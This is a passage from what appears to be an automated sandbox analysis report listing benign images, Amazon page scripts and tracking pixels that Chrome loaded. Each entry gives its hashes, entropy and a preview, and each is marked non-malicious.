                                                                                                                                                                                                        SHA-512:0DD02CB398A22092732CFAE2B141F5327360A42E931AFD27AAF8EAE402C8C36EF0BB5EDEA82EB39E66567DAED1CAA79B70CA4BF41D30387653563D0A78AB9B0E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE...*AC.38.'0")0!*"NT[......333............dim/8@/8A`goWVS. !...QV\...bejeee>AC......[bj}..PW`YtS............mwxjpv...MSY`fi;=@KR[......_di......djr....................................V]e...u....8,3..!..2..:...u..v....=?A,..j.......8...m.02.u..@).ojBGL0....."....8>D.n...2..9;=.>/..B..[........@@A.v......D4.)."..J.B? ..H..432...\.[..:H..#)-....* ...............................B.......................#......G.......P..J..:.................B..9..int.s..d.5g....I..9..I..jqwqz}.]I.. ..D.....E..$.......T....]...=..............cgk.....L...t.vm.OM.+......+.g...#........'..Q.ZY.%.f@.y................................P.1..<...N./..>......................s.i...P.........}...y...........;..;.F5.G6........%.............(Z"....tRNS............*......<.......{...%Zk.I....F~.....................*..Z<.......]...t..}.`'......h.....;....{..K..........L......^..e....B.*b.|..............d.....O....................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:1
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 440 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):51020
                                                                                                                                                                                                        Entropy (8bit):7.975897458742601
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:xXt/tY21WYpAMFo5H29LV4ggoYRq5r4wuT8yPni+8h82ZL8l2WfS/nK2C5jSIMZS:xTY2E6td1r5rxCHPuh82Zwl2WfgUCZts
                                                                                                                                                                                                        MD5:DA976A4961B2A142A4FCEF1FC9D97736
                                                                                                                                                                                                        SHA1:3FD690D17BBAB092F2B9DAA853539E26E1F1EA7E
                                                                                                                                                                                                        SHA-256:529B7DA2D028EB378393CF16A600012EDD6561EB9A4E6F1CDCA23BFED0D12A65
                                                                                                                                                                                                        SHA-512:5EE73DBB8A0A76293D05C3096F0290C72E88E38DB82E59D02D36F77865C13E8A6949615898D261E143B5A997CAB58BFBECBA7AC43C2E81D6B1CD30E9FF95AADE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE..U.......................T..S........V..R".=.....M........O........Q.#....%1@...........K..........7.....+.. ..&...+(4C....)9.).....%4........$..0..Q..........1.....>...L......LLK..........=.....2!edc...TTSDDC..Y....%.]\[....6$.%.Ot.qpo<<;...........T.T.iik.;-:Q..8.---...Zbm...Ha.=FV...443.F..go{BY.Lc.,E....7R..}-H...9Q.Wr..,.uwy%&&Xn....\}.5h.....%..../^.f..... <.....4#Fk.f|.&C.z..KSaF\..............y...L.....6.../9J.......sc..:v..H/....".../G........H..F6......[TK.....E1BR..4.m...cV...'P..[M.N@iy..9+...}8G....Xk.......ra[...L...RHc..dm.....H=.e....y......T^..qj..L.W=..W....`U'1w.to..b......=Cy..Vj73.....<.......l[6=S...x....pRX~.......,...R.I?.y9|...eZ.e5....L..}....O...~.}q.QE..x...wJ..2.8...zq6x....KW.....qLM.]r...`...#.z..@.!.....[.. .IDATx...o.H...8.0.@S.U..p....:Ps....J.u.R.........>...i.M.Evs7.~.Iy...X.H.HZ..~.}...c&.3.t.._....=oM&.z.u.....n..5.[...xM'.Y.Mgs].y.kqj...ZYv..u..i.*.@..'.{O...x...?...'^Y.~..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2504
                                                                                                                                                                                                        Entropy (8bit):7.683203594367942
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:q0fVRckJT428RUXeB6hSTJpau2y2xFNaxGIkamZRUsKenYpP94jbyqg2:JNRcM1zhETjVsFkuamZRUsOP9Dqz
                                                                                                                                                                                                        MD5:F90AA3D3F370FAF9FA196089CD86EEF9
                                                                                                                                                                                                        SHA1:4B1D37029773AC6C057C774954EB0C83B647FE23
                                                                                                                                                                                                        SHA-256:E59FC503FD4CC663A537D942E7FE4CC5D05BD505C22BEFA575A9B9263C08F30B
                                                                                                                                                                                                        SHA-512:4896EC010B3F83A5D41FE00A3D7139C3ED868E7C9893326B01C6270557B153244E4362D32C084451B807F0F312D131C4B1D197195CAB996BC15C9578248C52B3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................t...."..........7......................................................................q`...=.E+.YC.............:.S.s!h;o'a?\..]...l.........g...t}.....}....R.z3$.o........=..Y...B.h....!Ku|.nZwT....;k.l ......V......SUR..12..~rW.)=,.Bd.....i.&..b.~../.z'&^L.J.....T&@......3,.................?...9............................#3..$@CS.....s!"14DPc...AB.........?..E.Y...t..e6KH.......h..'HX...fK.......- ....Gv......vV..k.~..g....a.Y..,q).OP......g........^.dL<..+,....1.y.[...oQ1(./.0.....(..........q.<..Az..+*...A..b.lwK.W9...YK.....O...Zae.D.ef."....."t.2yM.:..4......R.k&.......$...B..._mQ[.....r~bY.3qb,.O.[......bY..^.e^W...B...{b.3...G.=P.X..K.TYu.m...2....H.)..8..*.Io.....^....Wv.d.F>...J....'._).m-..G+....w....Q7......lWq.....rQ.4...b....V.Or.V...K+.DD2..D};_'..........kQ..."..E.h..~..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (506)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1897
                                                                                                                                                                                                        Entropy (8bit):5.295537930728398
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:DxGQO2Vkgw6yp34Ih/Z/UD6B9zexGqpUDIRtVKn0FP0I2:DxG52VkgwtA6TeoIRDE0SI2
                                                                                                                                                                                                        MD5:84FC07603C6B7D7C8A4DEA1951AA3F51
                                                                                                                                                                                                        SHA1:81D1C249A0A70129C96F8111ABCFCB3E62F2F4ED
                                                                                                                                                                                                        SHA-256:1E90436DD878AC44E6868965D8DD7FFA194CBA607D31B83FF21CB31D48A70DF0
                                                                                                                                                                                                        SHA-512:1139A5C5A64AB3FB74832ECA3087D0A9E9C9277473A9FAC6156D03C43AB058F81C55F3C828273604E0F48C4290ED6AA538D8D53127CAE7F29D574E2AED34D422
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/01e0fnoXVzL.js?AUIClients/PerformanceResourceTimingAssets
                                                                                                                                                                                                        Preview:(function(c){var b=window.AmazonUIPageJS||window.P,f=b._namespace||b.attributeErrors,e=f?f("PerformanceResourceTimingAssets",""):b;e.guardFatal?e.guardFatal(c)(e,window):e.execute(function(){c(e,window)})})(function(c,b,f){"use strict";c.when("performance-resource-timing-utils").register("performance-resource-timing",function(e){function c(a){for(var h={},b=0;b<a.length;++b){var d=a[b],g=e.determineType(d.name),c=d.duration,m=d.responseEnd,k=d.transferSize||0;d=k/1024;k=0===k&&100>c;var l=h[g]||(h[g]=.{});g=function(a,b){l[a]=(l[a]||0)+(b!==f?b:1)};var n=function(a,b){l[a]=Math.max(l[a]||0,b)};g("requests");g("requests"+(k?"-cached":"-uncached"));g("total-duration",c);n("max-duration",c);g("total-transferred",d);n("max-transferred",d);n("long-pull",m)}p(h);return h}function p(a){for(var b in a)if(a.hasOwnProperty(b)){var c=a[b],d=100*(c["requests-cached"]||0)/c.requests;c["cache-hit-rate"]=d;c["cache-hit-rate-bucket"]=10*Math.ceil(d/10)}}function m(a,c){c=c!==f?c:1;b.ue&&b.ue.count&&b.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (312), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):312
                                                                                                                                                                                                        Entropy (8bit):5.0610226231601345
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:2LGHT3O/BHWYK7cidi61MRR1RcKMAuOLNhFys0NU3iBeHKeUIki:2k+/BHWYK7cUEc5OL0s0ahUIr
                                                                                                                                                                                                        MD5:CEE4A140BDD25DE758024B5972807BD0
                                                                                                                                                                                                        SHA1:837EAF911C0E7A1756F268491ED9B3328319F1B1
                                                                                                                                                                                                        SHA-256:C8D5B88634C6E632B62C5839E27E653182AFA6F95DC61BD078CE012041C8365D
                                                                                                                                                                                                        SHA-512:1F5CB78DCDE99F87E0BBEC4E72048609D423D9578226860564DA200917ACC9CD590AD58C8E8BF445D3EE421B53BDADA4E77B8E683704CB265990CF99E7F3A14C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(b){var c=window.AmazonUIPageJS||window.P,d=c._namespace||c.attributeErrors,a=d?d("F3CollapsedCartAssets",""):c;a.guardFatal?a.guardFatal(b)(a,window):a.execute(function(){b(a,window)})})(function(b,c,d){b.when("A").register("F3CartViewType",function(a){return{isCollapsedCart:function(){return!0}}})});
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5074
                                                                                                                                                                                                        Entropy (8bit):7.80698522057377
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:ThsZ53rbliBg7MukUJnMHlDkx/AhrhyH3JZZBVo+uYG83Dl+amddXM8x:Kj7xMuYioY5BVXG8UXXdx
                                                                                                                                                                                                        MD5:4FFA6D5B2C6C67790DBF4DB7801EA8CE
                                                                                                                                                                                                        SHA1:01F4F4C616ED03B2DE69253984CEEF9FC2C9508D
                                                                                                                                                                                                        SHA-256:FEEDA695E09744F58007B043146FC8AC339FC4485008B421E83D14DA0DE50076
                                                                                                                                                                                                        SHA-512:D4E34F49D3434C7CA5B1C311E7256446336D58DB5A74F89EAF55C2F01C690911453242ADEEC503A0CB16E1698358357DFB1B5614C824E5BD4E9637988AF696D9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/416xoG90KZL._SR240,220_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5.............................................................................................:...r..k.'..9..'.NmY..|.k....s.[tS..U..4....@....X..j..U.[.........6L..I.*.....c.{1....._..~..[z9....w........y..|........{}..R.A:SL2.....C5.S..P[.6.S..r.W......s..M..P....=..5..u].......F)...../.......<H.{.E..y.C..o8.3......+...M@...byf.Y.U[.m...9.%[.u.a....../8z'z.?..o.(...2.W...77zE...........U.5...[h..B....._.Xo...Xkar..m...[0.../..>.!.L..$..I:\0.......X........y4Wsi.1.X..oT.*.t.]j...M].%..>....e._.lQ.Nk...........U..j:/j*[I..W......A.t.h..s.1..s5.....e.0&..Q.4..[...t8A0..............|.=.2...o.....Q.4.k ....r.,.L.*..r...W5zU......./.!.y.h.H.7.h.....o......o.....Nl.........................?...-..........................14...!02."A.#35pD............... ....Q.n%...W7..!\.+..sp.n......Zuf.7H,..[
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3718
                                                                                                                                                                                                        Entropy (8bit):7.688627378509351
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TGgtPDzAKOsZ1aYkI62zket4JpBOjuwFLPv0iE97ynBQr1FjWMwon:nbzn1aG62lSRwuwF4iENyniFion
                                                                                                                                                                                                        MD5:2432EBFE16068CE8B56632DB9174309B
                                                                                                                                                                                                        SHA1:593B1BD3574A7AA1CC2C6E8D56EEF25AAEF3DF52
                                                                                                                                                                                                        SHA-256:EFA0C13C821530BB771903C86D0454D49A38E0F0E1182733275983077F820AD1
                                                                                                                                                                                                        SHA-512:C584CD0BA66F9F74F8F551880808325F99A10E77688E6BA2DC5F88A907795EE298ADCD79DE459BFEEE151F1578272334977BA4F2312A15E51825AB69426BC6BE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/31EO3Wv+aeL._SR240,220_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........1..............................................................X....................................!z.-.I............Cy4W&.h.c}....y.5=..&-....3.YZ..........H.sCr...Q.[.E.gR..K........]eN.*.V..5..C...h...|;.D;.._....QcF...e|.....x.....]K....n.a....v.......&.6..... %."...mU..`Pm#..S..>!......G.].M.z.x.../..`.j..dC..V.....t..Y...~#[...cE......n.=j.........X.).....#..&.%..+@..[.*]b$.c..9Y...o)....7.1...,.b.2.).W.....S.. .c.........-.....^q..]i9............`d.q..u.A...[0..|=.)X..x...:l.`#..""<{H`.D.......k.C.t..#.!.<..p....H..G....................................?...+..........................3.!01.. "2#p.@A............s.EU......q..:..W8...\.us..S....:.N.S....:.N.S......It.U.J2.....M..e6.m...6...JIOo.3!)...EO.^(.5|R..FFFFFFFFFFDr...I.F..{(c.]Ug,lk.Yn....Q.j......@......h.&..._.........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4406
                                                                                                                                                                                                        Entropy (8bit):7.708118239255408
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:R9OEXNkccDp0ks1wetNPNGCn+JLySBRbTbriM8hPMm/Laqjy:rQDvABtNFc3TbrUhPxWqW
                                                                                                                                                                                                        MD5:17CCA7168F2A2CD730390E9BE166250A
                                                                                                                                                                                                        SHA1:AA654D6E37A7D776DB85093F7EC4845B6DE1C7BB
                                                                                                                                                                                                        SHA-256:3C90972F1C2C388F93EAD7D80A517F9C87DF00692ABC29CCE7AF62880AEABE3A
                                                                                                                                                                                                        SHA-512:01C23E69EF968D67F20B25C90DF8F7C7317AC2A444E1863EA9ECA81238A8911FE1BD1041E2D8BF10854DD8AC9B29DBA054E69E592C334D29804A324DEE250BC4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_20_BTS24_AE_GW_QC-CROSSA_DQC_CL_Nutrition_186x116_EN._SY116_CB566993070_.jpg
                                                                                                                                                                                                        Preview:......Exif..II*.................Ducky.......(......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:6C265638478A11EFBAE58FF32B0F82A0" xmpMM:InstanceID="xmp.iid:6C265637478A11EFBAE58FF32B0F82A0" xmp:CreatorTool="Adobe Photoshop 2024 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="CE6620C76A0D1BC9846AF38E4B94797E" stRef:documentID="CE6620C76A0D1BC9846AF38E4B94797E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d.......................4................................................$$''$$53335;;;;;;;;;;.............................%......% #...# ((%%
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6950)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):263214
                                                                                                                                                                                                        Entropy (8bit):5.397171667330777
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:5QKXCg0QR9hMRCGZsO/WUPfwxTeNlVo3Pak4kfnq81fZAfDPpwi+hYoiNWUe90ek:5QKXCg0AMRCGZsO/WUPfwxTeNlVo3PaP
                                                                                                                                                                                                        MD5:E5A6193CC94133B60030CC712A52C27E
                                                                                                                                                                                                        SHA1:E5004B2C2767EE5318E307CB3804250ED6BB1407
                                                                                                                                                                                                        SHA-256:FF100CF0B57FA46DEE19029B39F54A32E28386687055F39BA430EFB12B26B5E9
                                                                                                                                                                                                        SHA-512:4A46EC54B867CB3B8F21631A740446FA9D56D12CF7986E37483EC31BA1CFECE989E3EAA5E7CB96708B0579BC0BA06448E35907306F889CC25E6805EC4D145D9E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("FWCIMAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET FWCIMAssets - 4.0./////////////////////////.// BEGIN FILE src/js/fwcim.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:1GXSAVZ7MBDVTNT0VYNB$uedata=s:%2Frd%2Fuedata%3Ful%26v%3D0.295223.0%26id%3D1GXSAVZ7MBDVTNT0VYNB%26m%3D1%26sc%3D1GXSAVZ7MBDVTNT0VYNB%26ue%3D7%26bb%3D1101%26ns%3D1276%26ne%3D1393%26cf%3D1395%26af%3D2238%26fn%3D2238%26be%3D2706%26fp%3D1311%26fcp%3D1311%26pc%3D7915%26tc%3D-1341%26na_%3D-1341%26ul_%3D-1723729085060%26_ul%3D-1723729085060%26rd_%3D-1723729085060%26_rd%3D-1723729085060%26fe_%3D-1337%26lk_%3D-1227%26_lk%3D-1227%26co_%3D-1227%26_co%3D-411%26sc_%3D-1212%26rq_%3D-386%26rs_%3D-56%26_rs%3D502%26dl_%3D-45%26di_%3D2770%26de_%3D2770%26_de%3D2770%26_dc%3D-1723729085060%26ld_%3D-1723729085060%26_ld%3D-1723729085060%26ntd%3D0%26ty%3D0%26rc%3D0%26hob%3D5%26hoe%3D8%26ul%3D7915%26t%3D1723729092975%26ctb%3D1%26rt%3Dcf%3A22-1-3-18-2-8-0_af%3A34-1-3-30-2-8-0_%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-09%7CmutObsYes%7Cnavbar%7CgwCFImgCache%7Caui%3Asw%3Apage_proxy%3Ano_ctrl%7Cadrender%3A68722d84-42e5-4770-9bd0-3ace4c1af9cc%7Cadrender%3AGateway%3Aright-2%3Adesktop%7Cadrender%3Alightad%3A68722d84-42e5-4770-9bd0-3ace4c1af9cc%7Cadrender%3Alightad%3AGateway%3Aright-2%3Adesktop%7Cadrender%3A68722d84-42e5-4770-9bd0-3ace4c1af9cc%3Acreativeid%3A579371395698106697%7Cadrender%3AGateway%3Aright-2%3Adesktop%3Acreativeid%3A579371395698106697%7Cadrender%3A68722d84-42e5-4770-9bd0-3ace4c1af9cc%3Aprogramid%3A1001%7Cadrender%3AGateway%3Aright-2%3Adesktop%3Aprogramid%3A1001%7Cadrender%3A68722d84-42e5-4770-9bd0-3ace4c1af9cc%3Acreativetemplatename%3Aimage%7Cadrender%3AGateway%3Aright-2%3Adesktop%3Acreativetemplatename%3Aimage%7CFWCIMEnabled%7Cfls-eu-amazon-ae%7Cadblk_no%7CperfYes%7Cak_cdn_fr%7Cak_cdn_mp%7CmutObsActive%7Ccsm-feature-touch-enabled%3Afalse%7CbrowserQuiteFn%26viz%3Dvisible%3A7%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26ui%3D2%26lob%3D1:7929
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 214x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):12647
                                                                                                                                                                                                        Entropy (8bit):7.967362930387541
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ePfFw7SszzJEoKLl2qev2kGkY7el9Tsx5KwsTvPEv3VrYlPeW9Rbue:md8PKBLI2Z9qtaKBvQYlP3Fue
                                                                                                                                                                                                        MD5:BEDC1CC440CF12E7571DAE8C4252B5A1
                                                                                                                                                                                                        SHA1:37474E6843B9D61766A36D8A15BFD26828C9DF5A
                                                                                                                                                                                                        SHA-256:C6F25761749444449A5DE23E98DE673E54B38D1DC2DB7DE317FAF17C5AD123CF
                                                                                                                                                                                                        SHA-512:22A5E4B1C1FFD177B9C13C0C04F99FBEE88B540D40C144D57288EFBC9AA198F94E401A759CB91C8C928EE391520745B346B38FD4C620B3A073F32E089452CB7D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".................................................................!.1.2AQ.."Uaqst.........#456RTbru....3B...7.Sd..$Cce..................................................!1..R."2Ar34BQaq..................?...mz.\......R......b........a>.o}+[A.{..... 1..Gk.d..}Td..ut......hS].H..{^Y.\..Q.L>p.xj..j.R.......h...,xs.>....u.......c.E..kOG.K.......fy..f"L...,..a...v.b.\.V.......,p8.....L..y...[>....fi../.%.p...8.#*)...Z..ZY...P..j.....{.B.V.s....l..)Rh..1......8....+..........%+_..>...5.i.CrR7.U..#.M.8...{.t...,,on.Y....>xOM.P..:.....W.....$..>.._%....(H?m.i.....}J.qG....~.......F..X.d.J.....".lu...,....4....E.&..u.V.B..Ez#..xZ.^I<..!B...*.i..[....QG....]..).(.yq...............[M..q*.s.Yc...P.o...../.O.G..}v......`.......f.......r....+.......+...>.K.S.Q....]..).*.z.8..&.`..).7.H".>....h{.;L..W..,c
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2602
                                                                                                                                                                                                        Entropy (8bit):7.766783626887012
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6PHCBZ+RmLA7ebdKqoqH8wGNZ+zbb8kVE0kWcbERy4Eg9SDipbWzpo/qTDA7:TXCCmA7eMbqdG7+zbb8k9obERBE+pbWS
                                                                                                                                                                                                        MD5:044D8774BF1CE1844C7CCBB215A17B74
                                                                                                                                                                                                        SHA1:B1B86A7948AA0D1EC95B67C6B661F610C06F73E8
                                                                                                                                                                                                        SHA-256:BE02B9714DDEF8DB2FFFC123CBB3BFAE4D8B395BE76B5568D274CA631B9834EB
                                                                                                                                                                                                        SHA-512:65B87A1023A52B31A84ED1BE9656951141DAF48BC0CED1456AB096FE3C9E45012F629423CC763EC67722912F372D5E915639CF2279CEEEEC21C873EC29A82DCF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
